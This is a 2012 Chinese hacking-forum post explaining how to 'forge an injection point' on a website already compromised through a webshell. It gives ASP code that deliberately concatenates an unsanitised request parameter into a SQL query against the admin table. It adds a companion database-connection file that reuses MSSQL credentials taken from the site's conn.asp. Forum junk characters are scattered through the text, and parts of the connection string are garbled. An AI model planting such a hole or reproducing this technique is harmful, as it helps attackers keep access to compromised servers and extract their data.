找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1867|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
自己构造注入点方便入侵
( h8 |* M: u7 v4 @; o9 Y2 s" b1 {+ e+ m7 F9 G; R  ^3 P8 P( x& r" B7 h
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息7 f7 m  f0 n3 A

: N& k- x1 Z( U" ]  a( M- i这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
' g3 \9 i# {# X2 G! y( |& N3 W
) x$ K' P. ^1 l0 Z首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
  u% B4 N. y$ ?6 j  A2 C' u& @! a8 \5 p* e* Z6 s9 L
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
( ~3 j' x( r& ]5 x0 T/ l* \7 O* n' @1 l% R4 E2 P
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
. D$ p$ x. n8 X- `9 f7 n" s
+ Q: [- W  W+ d9 X: [! h程序代码5 D" @9 |8 ]( R; |0 z) K
<!--#include file="xx.asp"-->
' w" [8 z- ^/ F<%
6 v. P/ r, Q1 Z% E9 j7 \set rs=server.createobject("ADODB.recordset")0 c, y, P; q  x9 {$ ]4 Y5 ~3 X
id = request("id")2 P  D4 k" P% z1 h6 n. m4 Q
strSQL = "select * from admin where id=" & id9 k! ]$ }3 ^4 K2 ^6 F$ U& a
rs.open strSQL,conn,1,3% |7 A1 C( a, Q# y$ S* Y
rs.close
4 Q8 {- j! U( j! X/ M3 ~4 K%>* w3 X) c) u/ d9 F
; f9 u- T7 e. r* N: t
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
9 t# F# B! W& {6 b
" E4 S! \1 \0 [9 G3 M; E  g4 R你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!- w! a/ r2 a. I  z' [

" y. g0 h. f) p然后就要构造一个连接数据库的文件了,代码如下:' X/ R; {( S5 y' M2 t
程序代码$ g( p# [& @9 ^
<%        : r7 V+ @$ M  A5 R# A! g
strSQLServerName = "000.000.000.000"     '服务器名称或地址
* s* J! b0 C0 y6 B! X# RstrSQLDBUserName = "sqlname"         '数据库帐号8 ^  d) Z  @8 _* p* _1 Y
strSQLDBPassword = "sqlpass"         '数据库密码
9 o! S9 s0 x! N; s' h* dstrSQLDBName = "sqldataname"           '数据库名称
6 s1 H$ P  a# g( W% JSet conn = Server.CreateObject("ADODB.Connection")( N/ |! y- q, m. u/ \! i
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"- o% h0 e, |; M9 j: P
conn.open strCon* x/ g  n1 V: }+ l0 k9 A& k9 f* X
%>5 m* F! Q3 ]6 e9 U- X9 X6 X0 Z+ r
# A7 F+ H7 `4 N, d
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
6 |+ ?: c. I# m
7 x7 z1 t7 x/ z2 y- F就这样,正常情况下,就OK了,伪造成功……4 h6 |, q; @1 t; j2 \% _
# R0 ]" ^( @! r+ O9 n
           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表